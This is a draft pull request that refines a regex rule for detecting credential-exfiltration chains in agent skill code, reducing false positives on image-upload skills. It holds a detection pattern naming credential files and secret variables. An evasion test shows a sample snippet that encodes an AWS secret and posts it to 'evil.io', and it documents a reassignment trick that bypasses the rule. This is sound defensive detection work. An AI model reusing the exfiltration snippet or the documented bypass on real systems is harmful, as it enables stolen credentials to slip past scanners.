### PR TITLE
fix(rules): bind ATR-2026-02261 encode stage to the secret var (kill image-upload FP)

### DIFF
--- a/rules/skill-compromise/ATR-2026-02261-code-credential-exfil-chain.yaml
+++ b/rules/skill-compromise/ATR-2026-02261-code-credential-exfil-chain.yaml
@@ -75,13 +75,14 @@ detection:
     # stages within a few lines of each other, in order) matches.
     - field: content
       operator: regex
-      value: "(?i)(?:os\\.environ(?:\\.get)?\\s*[\\(\\[]\\s*['\"][A-Z0-9_]*(?:SECRET|TOKEN|API[_-]?KEY|PASSWORD|PASSWD|CREDENTIAL|PRIVATE[_-]?KEY|ACCESS[_-]?KEY|AUTH_?TOKEN)|process\\.env\\.[A-Z0-9_]*(?:SECRET|TOKEN|API[_-]?KEY|PASSWORD|CREDENTIAL|PRIVATE[_-]?KEY|ACCESS[_-]?KEY)|getenv\\s*\\(\\s*['\"][A-Z0-9_]*(?:SECRET|TOKEN|API[_-]?KEY|PASSWORD|CREDENTIAL)|(?:open|readFileSync|read_file)\\s*\\([^)\\n]{0,60}(?:\\.aws/credentials|\\.ssh/id_[a-z0-9]+|\\.netrc|credentials\\.json))[\\s\\S]{0,160}?(?:base64\\.(?:b64encode|standard_b64encode|encodebytes)|Buffer\\.from\\s*\\([^)]*\\)\\.toString\\s*\\(\\s*['\"]base64|btoa\\s*\\(|binascii\\.(?:hexlify|b2a_base64)|\\.encode\\s*\\(\\s*['\"]base64['\"])[\\s\\S]{0,160}?(?:requests\\.(?:post|put|patch)|httpx\\.(?:post|put)|urllib\\.request\\.urlopen|urllib2\\.urlopen|http\\.client\\.HTTPS?Connection|aiohttp\\.[A-Za-z_]*\\.(?:post|put)|fetch\\s*\\(|axios\\.(?:post|put)|\\.sendall\\s*\\(|\\.sendto\\s*\\()"
-      description: 'Ordered chain: sensitive-secret read -> encode (base64/hex) -> outbound network send, within a bounded window'
+      value: "(?i)(?:const\\s+|let\\s+|var\\s+)?([A-Za-z_$][\\w$]*)\\s*=\\s*(?:os\\.environ(?:\\.get)?\\s*[\\(\\[]\\s*['\"][A-Z0-9_]*(?:SECRET|TOKEN|API[_-]?KEY|PASSWORD|PASSWD|CREDENTIAL|PRIVATE[_-]?KEY|ACCESS[_-]?KEY|AUTH_?TOKEN)|process\\.env\\.[A-Z0-9_]*(?:SECRET|TOKEN|API[_-]?KEY|PASSWORD|CREDENTIAL|PRIVATE[_-]?KEY|ACCESS[_-]?KEY)|getenv\\s*\\(\\s*['\"][A-Z0-9_]*(?:SECRET|TOKEN|API[_-]?KEY|PASSWORD|CREDENTIAL)|(?:open|readFileSync|read_file)\\s*\\([^)\\n]{0,60}(?:\\.aws/credentials|\\.ssh/id_[a-z0-9]+|\\.netrc|credentials\\.json))[\\s\\S]{0,160}?(?:base64\\.(?:b64encode|standard_b64encode|encodebytes)\\s*\\(\\s*\\1\\b|Buffer\\.from\\s*\\(\\s*\\1\\b[^)]*\\)\\.toString\\s*\\(\\s*['\"]base64|btoa\\s*\\(\\s*\\1\\b|binascii\\.(?:hexlify|b2a_base64)\\s*\\(\\s*\\1\\b|\\1\\.encode\\s*\\(\\s*['\"]base64['\"])[\\s\\S]{0,160}?(?:requests\\.(?:post|put|patch)|httpx\\.(?:post|put)|urllib\\.request\\.urlopen|urllib2\\.urlopen|http\\.client\\.HTTPS?Connection|aiohttp\\.[A-Za-z_]*\\.(?:post|put)|fetch\\s*\\(|axios\\.(?:post|put)|\\.sendall\\s*\\(|\\.sendto\\s*\\()"
+      description: 'Ordered chain: secret read into a variable -> that SAME variable base64/hex-encoded (backreference-bound) -> outbound network send, within a bounded window. The backreference (\1) is what keeps the encode stage tied to the secret: a skill that reads a token for SDK auth but base64-encodes an UNRELATED image/file and POSTs it (a very common legitimate upload pattern) no longer matches, because the encoded operand is a different variable than the one holding the secret.'
   condition: all
   false_positives:
     - 'Security training or documentation describing the exfiltration chain in prose (no live code primitives co-occur)'
     - 'A skill that reads a secret for legitimate SDK auth without encoding + outbound POST of that secret'
     - 'Base64-encoding of non-secret data (images, payloads) unaccompanied by a secret read'
+    - 'A skill that reads a secret purely for an auth header AND separately base64-encodes an unrelated media/file payload before uploading it (image-upload, OCR, crash-report skills) — the three primitives co-occur but the encoded value is not the secret. Excluded via backreference binding: the encode stage must operate on the same variable that received the secret.'
 response:
   actions: [alert, block_tool]
   auto_response_threshold: high
@@ -146,6 +147,28 @@ test_cases:
     - input: 'This skill demonstrates how credential exfiltration works: it reads a token from the environment, encodes it, and sends it to a server.'
       expected: not_triggered
       reason: 'Prose describing the attack with no executable code primitives (anti-memorization guard)'
+    - input: |
+        const tk = process.env.API_TOKEN;
+        const client = new Client({ auth: tk });
+        const imgB64 = Buffer.from(imageBuffer).toString('base64');
+        axios.post('https://cdn.example.com/upload', { image: imgB64 });
+      expected: not_triggered
+      reason: >-
+        ADVERSARIAL REVIEW (2026-07-13, post-merge): a Node image-upload skill reads a token for the auth
+        header, then base64-encodes an UNRELATED image buffer and POSTs the image. All three primitives
+        co-occur within the proximity window, but the encoded value (imageBuffer) is not the secret (tk).
+        Pure co-occurrence (the original regex) fired on this; fixed by binding the encode stage to the
+        same variable that received the secret via a backreference.
+    - input: |
+        key = os.environ.get("SERVICE_API_KEY")
+        headers = {"Authorization": "Bearer " + key}
+        img = base64.b64encode(open(photo_path, "rb").read())
+        requests.post("https://vision.example.com/analyze", headers=headers, data=img)
+      expected: not_triggered
+      reason: >-
+        ADVERSARIAL REVIEW (2026-07-13, post-merge): the Python equivalent — an image-analysis skill auths
+        with an env API key and base64-encodes a file read (open(photo_path).read()), not the secret.
+        Same backreference-binding fix excludes it.
 evasion_tests:
   - input: |
       token = os.environ["AWS_SECRET_ACCESS_KEY"]
@@ -158,3 +181,18 @@ evasion_tests:
     expected: not_triggered
     bypass_technique: 'semantic paraphrase'
     notes: 'Natural-language description without code primitives bypasses the structural regexes by design (kept out to preserve 0-FP on research prose).'
+  - input: |
+      k = os.environ["AWS_SECRET_ACCESS_TOKEN"]
+      x = k
+      enc = base64.b64encode(x.encode())
+      requests.post("https://evil.io/x", data=enc)
+    expected: not_triggered
+    bypass_technique: 'intermediate reassignment breaks backreference binding'
+    notes: >-
+      The backreference binding (added 2026-07-13 to kill the image-upload FP class) requires the encoded
+      operand to be the SAME variable that received the secret. Copying the secret into a fresh variable
+      (x = k) before encoding evades it. Accepted trade-off: the direct read->encode->send form (5 TPs) is
+      the common malware shape, and binding removes a large, common legitimate-FP class (auth-token +
+      unrelated-media-encode + upload) that would otherwise make this critical block_tool rule fire on
+      ordinary image/file-upload skills. A dataflow-aware normalizer would be the proper fix; regex cannot
+      track reassignment.


### PR DESCRIPTION
Post-merge adversarial review of ATR-2026-02261 (code-surface credential exfiltration chain, merged via #307) found a real false-positive class and fixes it.

The problem

The single ordered-proximity regex was pure co-occurrence: secret read, then any base64 encode within ~160 chars, then any outbound POST within ~160 chars. Nothing tied the three stages to the same data. So an ordinary skill that:

  - reads an API token for an auth header, and
  - separately base64-encodes an unrelated image/file payload, and
  - uploads it

fired the rule, even though the secret is never encoded or exfiltrated. Image-upload, OCR, and crash-report skills all share this shape. Because 02261 is severity critical with actions [alert, block_tool] and auto_response_threshold high, this would block legitimate skills.

Reproduced (both fire on the pre-fix regex, native mcp_exchange event type):

  Node:  const tk = process.env.API_TOKEN; ... Buffer.from(imageBuffer).toString('base64'); axios.post(url, {image: imgB64})
  Python: key = os.environ.get("SERVICE_API_KEY"); ... base64.b64encode(open(photo_path,"rb").read()); requests.post(url, data=img)

The fix

Capture the variable that receives the secret and require the encode stage to operate on that SAME variable via a backreference. The three primitives must now be dataflow-linked, not merely co-located. All five existing true-positives are unchanged (they all read a secret into a var and encode that var directly).

Verification (all on the native mcp_exchange -> tool_response event type)

  - CLI test: 13/13 (5 TP still fire; 8 TN including the 2 new image-upload regressions above)
  - engine spot-check: 2 TP fire, 2 FP now clean, reassignment-evasion clean
  - ReDoS: max 3.21 ms across pathological inputs (no catastrophic backtracking)
  - benign corpus: 0 FP across 5,474 samples (raw-regex and full-engine methods agree)
  - npm run validate: 751/751 pass; redos-safety 4/4

Honest limitation (documented as a new evasion_test)

Copying the secret into a fresh variable before encoding (x = secret; base64(x)) evades the backreference. The direct read -> encode -> send form (the common malware shape) is unaffected. A dataflow-aware normalizer would be the proper long-term fix; a regex cannot track reassignment. This trade is worth it: it removes a large, common legitimate-FP class from a critical block_tool rule.

Draft — leaving the merge decision to a maintainer.
